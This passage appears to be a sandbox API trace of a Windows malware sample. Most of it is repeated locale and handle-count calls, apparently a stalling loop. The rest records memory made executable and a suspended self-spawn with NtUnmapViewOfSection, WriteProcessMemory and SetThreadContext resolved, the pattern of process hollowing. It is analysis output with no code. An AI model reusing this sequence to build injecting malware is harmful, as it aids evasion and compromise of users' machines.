| out: pdwHandleCount=0x0) returned 0 [0166.638] GetSystemDefaultLangID () returned 0x26d0409 [0166.638] GetThreadLocale () returned 0x409 [0166.638] GetCurrentProcess () returned 0xffffffff [0166.638] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.638] GetSystemDefaultLangID () returned 0x26d0409 [0166.638] GetThreadLocale () returned 0x409 [0166.638] GetCurrentProcess () returned 0xffffffff [0166.638] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.638] GetSystemDefaultLangID () returned 0x26d0409 [0166.638] GetThreadLocale () returned 0x409 [0166.638] GetCurrentProcess () returned 0xffffffff [0166.638] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.638] GetSystemDefaultLangID () returned 0x26d0409 [0166.638] GetThreadLocale () returned 0x409 [0166.638] GetCurrentProcess () returned 0xffffffff [0166.638] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.638] GetSystemDefaultLangID () returned 0x26d0409 [0166.638] GetThreadLocale () returned 0x409 [0166.638] GetCurrentProcess () returned 0xffffffff [0166.638] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.638] GetSystemDefaultLangID () returned 0x26d0409 [0166.638] GetThreadLocale () returned 0x409 [0166.638] GetCurrentProcess () returned 0xffffffff [0166.638] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.638] GetSystemDefaultLangID () returned 0x26d0409 [0166.639] GetThreadLocale () returned 0x409 [0166.639] GetCurrentProcess () returned 0xffffffff [0166.639] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.639] GetSystemDefaultLangID () returned 0x26d0409 [0166.639] GetThreadLocale () returned 0x409 [0166.639] GetCurrentProcess () returned 0xffffffff [0166.639] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.639] GetSystemDefaultLangID () returned 0x26d0409 [0166.639] GetThreadLocale () returned 0x409 [0166.639] GetCurrentProcess () returned 0xffffffff [0166.639] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.639] GetSystemDefaultLangID () returned 0x26d0409 [0166.639] GetThreadLocale () returned 0x409 [0166.639] GetCurrentProcess () returned 0xffffffff [0166.639] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.639] GetSystemDefaultLangID () returned 0x26d0409 [0166.639] GetThreadLocale () returned 0x409 [0166.639] GetCurrentProcess () returned 0xffffffff [0166.639] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.639] GetSystemDefaultLangID () returned 0x26d0409 [0166.639] GetThreadLocale () returned 0x409 [0166.639] GetCurrentProcess () returned 0xffffffff [0166.639] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.639] GetSystemDefaultLangID () returned 0x26d0409 [0166.639] GetThreadLocale () returned 0x409 [0166.640] GetCurrentProcess () returned 0xffffffff [0166.640] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.640] GetSystemDefaultLangID () returned 0x26d0409 [0166.640] GetThreadLocale () returned 0x409 [0166.640] GetCurrentProcess () returned 0xffffffff [0166.640] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.640] GetSystemDefaultLangID () returned 0x26d0409 [0166.640] GetThreadLocale () returned 0x409 [0166.640] GetCurrentProcess () returned 0xffffffff [0166.640] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.640] GetSystemDefaultLangID () returned 0x26d0409 [0166.640] GetThreadLocale () returned 0x409 [0166.640] GetCurrentProcess () returned 0xffffffff [0166.640] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.640] GetSystemDefaultLangID () returned 0x26d0409 [0166.640] GetThreadLocale () returned 0x409 [0166.640] GetCurrentProcess () returned 0xffffffff [0166.640] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.640] GetSystemDefaultLangID () returned 0x26d0409 [0166.640] GetThreadLocale () returned 0x409 [0166.640] GetCurrentProcess () returned 0xffffffff [0166.640] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.640] GetSystemDefaultLangID () returned 0x26d0409 [0166.640] GetThreadLocale () returned 0x409 [0166.640] GetCurrentProcess () returned 0xffffffff [0166.640] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.641] GetSystemDefaultLangID () returned 0x26d0409 [0166.641] GetThreadLocale () returned 0x409 [0166.641] GetCurrentProcess () returned 0xffffffff [0166.641] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.641] GetSystemDefaultLangID () returned 0x26d0409 [0166.641] GetThreadLocale () returned 0x409 [0166.641] GetCurrentProcess () returned 0xffffffff [0166.641] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.641] GetSystemDefaultLangID () returned 0x26d0409 [0166.641] GetThreadLocale () returned 0x409 [0166.641] GetCurrentProcess () returned 0xffffffff [0166.641] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.641] GetSystemDefaultLangID () returned 0x26d0409 [0166.641] GetThreadLocale () returned 0x409 [0166.641] GetCurrentProcess () returned 0xffffffff [0166.641] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.641] GetSystemDefaultLangID () returned 0x26d0409 [0166.641] GetThreadLocale () returned 0x409 [0166.641] GetCurrentProcess () returned 0xffffffff [0166.641] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.641] GetSystemDefaultLangID () returned 0x26d0409 [0166.641] GetThreadLocale () returned 0x409 [0166.641] GetCurrentProcess () returned 0xffffffff [0166.641] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.641] GetSystemDefaultLangID () returned 0x26d0409 [0166.641] GetThreadLocale () returned 0x409 [0166.641] GetCurrentProcess () returned 0xffffffff [0166.642] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.642] GetSystemDefaultLangID () returned 0x26d0409 [0166.642] GetThreadLocale () returned 0x409 [0166.642] GetCurrentProcess () returned 0xffffffff [0166.642] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.642] GetSystemDefaultLangID () returned 0x26d0409 [0166.642] GetThreadLocale () returned 0x409 [0166.642] GetCurrentProcess () returned 0xffffffff [0166.642] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.642] GetSystemDefaultLangID () returned 0x26d0409 [0166.642] GetThreadLocale () returned 0x409 [0166.642] GetCurrentProcess () returned 0xffffffff [0166.642] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.642] GetSystemDefaultLangID () returned 0x26d0409 [0166.642] GetThreadLocale () returned 0x409 [0166.642] GetCurrentProcess () returned 0xffffffff [0166.642] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.642] GetSystemDefaultLangID () returned 0x26d0409 [0166.642] GetThreadLocale () returned 0x409 [0166.642] GetCurrentProcess () returned 0xffffffff [0166.642] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.642] GetSystemDefaultLangID () returned 0x26d0409 [0166.642] GetThreadLocale () returned 0x409 [0166.642] GetCurrentProcess () returned 0xffffffff [0166.642] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.643] GetSystemDefaultLangID () returned 0x26d0409 [0166.643] GetThreadLocale () returned 0x409 [0166.643] GetCurrentProcess () returned 0xffffffff [0166.643] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.643] GetSystemDefaultLangID () returned 0x26d0409 [0166.643] GetThreadLocale () returned 0x409 [0166.643] GetCurrentProcess () returned 0xffffffff [0166.643] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.643] GetSystemDefaultLangID () returned 0x26d0409 [0166.643] GetThreadLocale () returned 0x409 [0166.643] GetCurrentProcess () returned 0xffffffff [0166.643] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.643] GetSystemDefaultLangID () returned 0x26d0409 [0166.643] GetThreadLocale () returned 0x409 [0166.643] GetCurrentProcess () returned 0xffffffff [0166.643] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.643] GetSystemDefaultLangID () returned 0x26d0409 [0166.643] GetThreadLocale () returned 0x409 [0166.643] GetCurrentProcess () returned 0xffffffff [0166.643] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.643] GetSystemDefaultLangID () returned 0x26d0409 [0166.643] GetThreadLocale () returned 0x409 [0166.643] GetCurrentProcess () returned 0xffffffff [0166.643] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.643] GetSystemDefaultLangID () returned 0x26d0409 [0166.643] GetThreadLocale () returned 0x409 [0166.644] GetCurrentProcess () returned 0xffffffff [0166.644] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.644] GetSystemDefaultLangID () returned 0x26d0409 [0166.644] GetThreadLocale () returned 0x409 [0166.644] GetCurrentProcess () returned 0xffffffff [0166.644] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.644] GetSystemDefaultLangID () returned 0x26d0409 [0166.644] GetThreadLocale () returned 0x409 [0166.644] GetCurrentProcess () returned 0xffffffff [0166.644] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.644] GetSystemDefaultLangID () returned 0x26d0409 [0166.644] GetThreadLocale () returned 0x409 [0166.644] GetCurrentProcess () returned 0xffffffff [0166.644] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.644] GetSystemDefaultLangID () returned 0x26d0409 [0166.644] GetThreadLocale () returned 0x409 [0166.644] GetCurrentProcess () returned 0xffffffff [0166.644] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.644] GetSystemDefaultLangID () returned 0x26d0409 [0166.644] GetThreadLocale () returned 0x409 [0166.644] GetCurrentProcess () returned 0xffffffff [0166.644] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.644] GetSystemDefaultLangID () returned 0x26d0409 [0166.644] GetThreadLocale () returned 0x409 [0166.644] GetCurrentProcess () returned 0xffffffff [0166.645] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.645] GetSystemDefaultLangID () returned 0x26d0409 [0166.645] GetThreadLocale () returned 0x409 [0166.645] GetCurrentProcess () returned 0xffffffff [0166.645] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.645] GetSystemDefaultLangID () returned 0x26d0409 [0166.645] GetThreadLocale () returned 0x409 [0166.645] GetCurrentProcess () returned 0xffffffff [0166.645] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.645] GetSystemDefaultLangID () returned 0x26d0409 [0166.645] GetThreadLocale () returned 0x409 [0166.645] GetCurrentProcess () returned 0xffffffff [0166.645] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.645] GetSystemDefaultLangID () returned 0x26d0409 [0166.645] GetThreadLocale () returned 0x409 [0166.645] GetCurrentProcess () returned 0xffffffff [0166.645] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.645] GetSystemDefaultLangID () returned 0x26d0409 [0166.645] GetThreadLocale () returned 0x409 [0166.645] GetCurrentProcess () returned 0xffffffff [0166.645] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.645] GetSystemDefaultLangID () returned 0x26d0409 [0166.645] GetThreadLocale () returned 0x409 [0166.645] GetCurrentProcess () returned 0xffffffff [0166.645] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.645] GetSystemDefaultLangID () returned 0x26d0409 [0166.646] GetThreadLocale () returned 0x409 [0166.646] GetCurrentProcess () returned 0xffffffff [0166.646] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.646] GetSystemDefaultLangID () returned 0x26d0409 [0166.646] GetThreadLocale () returned 0x409 [0166.646] GetCurrentProcess () returned 0xffffffff [0166.646] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.646] GetSystemDefaultLangID () returned 0x26d0409 [0166.646] GetThreadLocale () returned 0x409 [0166.646] GetCurrentProcess () returned 0xffffffff [0166.646] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.646] GetSystemDefaultLangID () returned 0x26d0409 [0166.646] GetThreadLocale () returned 0x409 [0166.646] GetCurrentProcess () returned 0xffffffff [0166.646] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.646] GetSystemDefaultLangID () returned 0x26d0409 [0166.646] GetThreadLocale () returned 0x409 [0166.646] GetCurrentProcess () returned 0xffffffff [0166.646] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.646] GetSystemDefaultLangID () returned 0x26d0409 [0166.646] GetThreadLocale () returned 0x409 [0166.646] GetCurrentProcess () returned 0xffffffff [0166.646] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.646] GetSystemDefaultLangID () returned 0x26d0409 [0166.646] GetThreadLocale () returned 0x409 [0166.646] GetCurrentProcess () returned 0xffffffff [0166.647] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.647] GetSystemDefaultLangID () returned 0x26d0409 [0166.647] GetThreadLocale () returned 0x409 [0166.647] GetCurrentProcess () returned 0xffffffff [0166.647] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.647] GetSystemDefaultLangID () returned 0x26d0409 [0166.647] GetThreadLocale () returned 0x409 [0166.647] GetCurrentProcess () returned 0xffffffff [0166.647] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.647] GetSystemDefaultLangID () returned 0x26d0409 [0166.647] GetThreadLocale () returned 0x409 [0166.647] GetCurrentProcess () returned 0xffffffff [0166.647] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.647] GetSystemDefaultLangID () returned 0x26d0409 [0166.647] GetThreadLocale () returned 0x409 [0166.647] GetCurrentProcess () returned 0xffffffff [0166.647] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.647] GetSystemDefaultLangID () returned 0x26d0409 [0166.647] GetThreadLocale () returned 0x409 [0166.647] GetCurrentProcess () returned 0xffffffff [0166.647] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.647] GetSystemDefaultLangID () returned 0x26d0409 [0166.647] GetThreadLocale () returned 0x409 [0166.647] GetCurrentProcess () returned 0xffffffff [0166.647] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.648] GetSystemDefaultLangID () returned 0x26d0409 [0166.648] GetThreadLocale () returned 0x409 [0166.648] GetCurrentProcess () returned 0xffffffff [0166.648] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.648] GetSystemDefaultLangID () returned 0x26d0409 [0166.648] GetThreadLocale () returned 0x409 [0166.648] GetCurrentProcess () returned 0xffffffff [0166.648] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.648] GetSystemDefaultLangID () returned 0x26d0409 [0166.648] GetThreadLocale () returned 0x409 [0166.648] GetCurrentProcess () returned 0xffffffff [0166.648] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.648] GetSystemDefaultLangID () returned 0x26d0409 [0166.648] GetThreadLocale () returned 0x409 [0166.648] GetCurrentProcess () returned 0xffffffff [0166.648] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.648] GetSystemDefaultLangID () returned 0x26d0409 [0166.648] GetThreadLocale () returned 0x409 [0166.648] GetCurrentProcess () returned 0xffffffff [0166.648] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.648] GetSystemDefaultLangID () returned 0x26d0409 [0166.648] GetThreadLocale () returned 0x409 [0166.648] GetCurrentProcess () returned 0xffffffff [0166.648] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.648] GetSystemDefaultLangID () returned 0x26d0409 [0166.648] GetThreadLocale () returned 0x409 [0166.648] GetCurrentProcess () returned 0xffffffff [0166.649] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.649] GetSystemDefaultLangID () returned 0x26d0409 [0166.649] GetThreadLocale () returned 0x409 [0166.649] GetCurrentProcess () returned 0xffffffff [0166.649] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.649] GetSystemDefaultLangID () returned 0x26d0409 [0166.649] GetThreadLocale () returned 0x409 [0166.649] GetCurrentProcess () returned 0xffffffff [0166.649] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0166.649] GetSystemDefaultLangID () returned 0x26d0409 [0166.649] GetThreadLocale () returned 0x409 [0168.315] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75cd0000 [0168.316] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75cd0000 [0168.316] GetProcAddress (hModule=0x75cd0000, lpProcName="VirtualProtect") returned 0x75ce4317 [0168.316] VirtualProtect (in: lpAddress=0x240020, dwSize=0x91148, flNewProtect=0x40, lpflOldProtect=0x18e818 | out: lpflOldProtect=0x18e818*=0x4) returned 1 [0169.115] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75cd0000 [0169.116] GetProcAddress (hModule=0x75cd0000, lpProcName="GlobalAlloc") returned 0x75ce5846 [0169.116] GetProcAddress (hModule=0x75cd0000, lpProcName="GetLastError") returned 0x75ce11c0 [0169.116] GetProcAddress (hModule=0x75cd0000, lpProcName="Sleep") returned 0x75ce10ff [0169.116] GetProcAddress (hModule=0x75cd0000, lpProcName="VirtualAlloc") returned 0x75ce1836 [0169.116] GetProcAddress (hModule=0x75cd0000, lpProcName="CreateToolhelp32Snapshot") returned 0x75d07327 [0169.117] GetProcAddress (hModule=0x75cd0000, lpProcName="Module32First") returned 0x75d66279 [0169.117] GetProcAddress (hModule=0x75cd0000, lpProcName="CloseHandle") returned 0x75ce13f0 [0169.117] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x5c [0169.121] Module32First (hSnapshot=0x5c, lpme=0x18e5a4) returned 1 [0169.124] VirtualAlloc (lpAddress=0x0, dwSize=0x11a5a0, flAllocationType=0x1000, flProtect=0x40) returned 0x2540000 [0169.214] LoadLibraryA (lpLibFileName="user32") returned 0x76010000 [0169.215] GetProcAddress (hModule=0x76010000, lpProcName="MessageBoxA") returned 0x7607fd1e [0169.215] GetProcAddress (hModule=0x76010000, lpProcName="GetMessageExtraInfo") returned 0x7604ed76 [0169.215] LoadLibraryA (lpLibFileName="kernel32") returned 0x75cd0000 [0169.215] GetProcAddress (hModule=0x75cd0000, lpProcName="WinExec") returned 0x75d63051 [0169.215] GetProcAddress (hModule=0x75cd0000, lpProcName="CreateFileA") returned 0x75ce537e [0169.215] GetProcAddress (hModule=0x75cd0000, lpProcName="WriteFile") returned 0x75ce1282 [0169.216] GetProcAddress (hModule=0x75cd0000, lpProcName="CloseHandle") returned 0x75ce13f0 [0169.216] GetProcAddress (hModule=0x75cd0000, lpProcName="CreateProcessA") returned 0x75ce1072 [0169.216] GetProcAddress (hModule=0x75cd0000, lpProcName="GetThreadContext") returned 0x75d0799c [0169.216] GetProcAddress (hModule=0x75cd0000, lpProcName="VirtualAlloc") returned 0x75ce1836 [0169.216] GetProcAddress (hModule=0x75cd0000, lpProcName="VirtualAllocEx") returned 0x75cfd980 [0169.216] GetProcAddress (hModule=0x75cd0000, lpProcName="VirtualFree") returned 0x75ce184e [0169.216] GetProcAddress (hModule=0x75cd0000, lpProcName="ReadProcessMemory") returned 0x75cfcfa4 [0169.217] GetProcAddress (hModule=0x75cd0000, lpProcName="WriteProcessMemory") returned 0x75cfd9b0 [0169.217] GetProcAddress (hModule=0x75cd0000, lpProcName="SetThreadContext") returned 0x75d65933 [0169.217] GetProcAddress (hModule=0x75cd0000, lpProcName="ResumeThread") returned 0x75ce43a7 [0169.217] GetProcAddress (hModule=0x75cd0000, lpProcName="WaitForSingleObject") returned 0x75ce1136 [0169.217] GetProcAddress (hModule=0x75cd0000, lpProcName="GetModuleFileNameA") returned 0x75ce1491 [0169.217] GetProcAddress (hModule=0x75cd0000, lpProcName="GetCommandLineA") returned 0x75ce5159 [0169.217] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77300000 [0169.224] GetProcAddress (hModule=0x77300000, lpProcName="NtUnmapViewOfSection") returned 0x7731fc70 [0169.224] GetProcAddress (hModule=0x77300000, lpProcName="NtWriteVirtualMemory") returned 0x7731fe04 [0169.224] GetProcAddress (hModule=0x76010000, lpProcName="RegisterClassExA") returned 0x7602db98 [0169.224] GetProcAddress (hModule=0x76010000, lpProcName="CreateWindowExA") returned 0x7602d22e [0169.224] GetProcAddress (hModule=0x76010000, lpProcName="PostMessageA") returned 0x76033baa [0169.225] GetProcAddress (hModule=0x76010000, lpProcName="GetMessageA") returned 0x76027bd3 [0169.225] GetProcAddress (hModule=0x76010000, lpProcName="DefWindowProcA") returned 0x773424e0 [0169.225] GetProcAddress (hModule=0x75cd0000, lpProcName="GetFileAttributesA") returned 0x75ce53cc [0169.225] GetProcAddress (hModule=0x75cd0000, lpProcName="GetStartupInfoA") returned 0x75ce0e00 [0169.225] GetProcAddress (hModule=0x75cd0000, lpProcName="VirtualProtectEx") returned 0x75d64b5f [0169.225] GetProcAddress (hModule=0x75cd0000, lpProcName="ExitProcess") returned 0x75ce79c8 [0169.225] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0169.226] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0169.226] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\windows\\syswow64\\apfhq")) returned 0xffffffff [0169.226] RegisterClassExA (param_1=0x18e260) returned 0x25c068 [0169.257] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x20016 [0169.730] PostMessageA (hWnd=0x20016, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0169.730] GetMessageA (in: lpMsg=0x18e290, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e290) returned 1 [0169.731] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0169.731] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x210000, nSize=0x2800 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe")) returned 0x8a [0169.732] GetStartupInfoA (in: lpStartupInfo=0x18e1b4 | out: lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0169.732] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart" [0169.732] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", lpCommandLine="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18e20c | out: lpCommandLine="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart", lpProcessInformation=0x18e20c*(hProcess=0x78, hThread=0x74, dwProcessId=0x7dc, dwThreadId=0x7e0)) returned 1 [0169.781] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.782] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0169.782] GetThreadContext (in: hThread=0x74, lpContext=0x210000 | out: lpContext=0x210000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, 